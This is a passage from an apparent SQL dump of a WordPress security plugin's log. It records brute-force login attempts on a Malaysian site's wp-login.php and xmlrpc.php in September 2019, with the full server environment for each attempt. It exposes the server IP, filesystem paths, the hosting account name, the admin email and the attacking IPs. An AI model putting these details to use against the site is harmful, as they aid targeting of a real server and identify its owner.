13:03:44',17738768,19229624,'https://bintara.com.my/wp-login.php',1,0,'128.199.155.15'),(23860,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"44048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX40K@esTgPVjZVPWmsVRgAAAMA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568551979.1394\";s:12:\"REQUEST_TIME\";s:10:\"1568551979\";}}','notice','2019-09-15 12:53:00','2019-09-15 12:52:59',18257904,19555392,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.90.9'),(23859,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"43108\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX40JOoTLkHKFi2qF7ErcQAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568551972.1392\";s:12:\"REQUEST_TIME\";s:10:\"1568551972\";}}','notice','2019-09-15 12:52:53','2019-09-15 12:52:52',17743168,19233904,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(23858,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"14.248.83.23\";s:11:\"REMOTE_PORT\";s:5:\"38324\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4x0uoTLkHKFi2qF7EojwAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568551378.9932\";s:12:\"REQUEST_TIME\";s:10:\"1568551378\";}}','notice','2019-09-15 12:43:00','2019-09-15 12:42:59',18253400,19551336,'https://bintara.com.my/xmlrpc.php',1,0,'14.248.83.23'),(23856,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"53676\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4uoqPPIU0WjPk-sOusAQAAAYQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568550562.4183\";s:12:\"REQUEST_TIME\";s:10:\"1568550562\";}}','notice','2019-09-15 12:29:24','2019-09-15 12:29:22',18253056,19551176,'https://bintara.com.my/xmlrpc.php',1,0,'150.164.122.1'),(23857,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"118.70.239.146\";s:11:\"REMOTE_PORT\";s:5:\"37722\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4xz@oTLkHKFi2qF7EohAAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568551375.2824\";s:12:\"REQUEST_TIME\";s:10:\"1568551375\";}}','notice','2019-09-15 12:42:56','2019-09-15 12:42:55',17739264,19229648,'https://bintara.com.my/wp-login.php',1,0,'118.70.239.146'),(23855,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"53058\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX4unuoTLkHKFi2qF7EmkAAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568550558.8714\";s:12:\"REQUEST_TIME\";s:10:\"1568550558\";}}','notice','2019-09-15 12:29:20','2019-09-15 12:29:19',17739488,19230520,'https://bintara.com.my/wp-login.php',1,0,'150.164.122.1'),(24288,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"45804\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAEQ2ShanGhHYaqyCTTDAAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568670787.9017\";s:12:\"REQUEST_TIME\";s:10:\"1568670787\";}}','notice','2019-09-16 21:53:09','2019-09-16 21:53:08',17740792,19231496,'https://bintara.com.my/wp-login.php',1,0,'159.253.32.120'),(24287,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"54520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYABfmShanGhHYaqyCTQRwAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568670078.3268\";s:12:\"REQUEST_TIME\";s:10:\"1568670078\";}}','notice','2019-09-16 21:41:20','2019-09-16 21:41:19',18259664,19558056,'https://bintara.com.my/xmlrpc.php',1,0,'148.66.133.15'),(24286,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"54078\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYABe2kPXSyJlCUJQmoqGQAAAYA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568670075.6381\";s:12:\"REQUEST_TIME\";s:10:\"1568670075\";}}','notice','2019-09-16 21:41:17','2019-09-16 